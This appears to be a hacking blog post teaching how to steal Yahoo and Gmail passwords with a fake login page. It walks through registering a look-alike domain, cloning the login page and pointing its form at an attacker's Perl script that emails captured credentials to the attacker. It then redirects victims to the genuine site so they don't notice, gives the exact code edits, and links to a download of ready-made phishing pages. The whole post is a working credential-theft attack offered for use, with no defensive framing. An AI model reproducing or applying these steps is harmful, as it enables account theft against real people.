
How to Hack E-mail Passwords
The other most commonly used trick to hack email password is using Fake Login Pages.
[phishing] Today, Fake login pages are the most widely used techniques to hack an email
account. A Fake Login page is a page that appears exactly as a Login page but once we
enter our password there, we end up loosing it.
Fake login pages are created by many hackers on their sites which appear exactly as
Gmail or Yahoo login pages but the entered details(username & password) are redirected to
remote server and we get redirected to some other page. Many times we ignore this but
finally we loose our valuable data.
However creating a fake login page and taking it online to successfully hack an email
account is not an easy job.
How to Hack Yahoo/Gmail/Orkut or any Password?
Requirements:
Just purchase hosting from any company and the domain will be similar to yahoomail.com
like yahooomail.com after upload 3 files.
1. index.html (same clone of the yahoo.com)—just change method
2. info.pl (used to send passwords to our email address)
3. thankyou.htm file to redirect phishing page to orginal yahoomail.com .
open yahoomail.com and save as file index.html open this file in notepad and
search method and change this line to:
Original line:
<form method="post" action="https://login.yahoo.com/config/login?"
autocomplete="off" name="login_form" onsubmit="return hash2(this)">
New:
<form method="post" action="http://ourwebsite.com/info.pl" name="login_form">
And after save and upload to ourwebsite like( www.yahooomail.com)
And edit info.pl to:
my $HTML_thankyou = 'http://www.yahoomail.com/thankyou.htm';
my $to = 'myemail@yaho.com;
my $from = 'mail@yahooomail.com';
and also edit thankyou.html:
code to:
<meta http-equiv="refresh" content="3; url=https://login.yahoo.com/config/login?">
upload and set 777 permission on info.pl
Download Here: All important Phishing/Fake Login Pages.
If u liked this post then please subscribe to this blog via E-mail(on the right-hand side of this blog) and also bookmark this blog....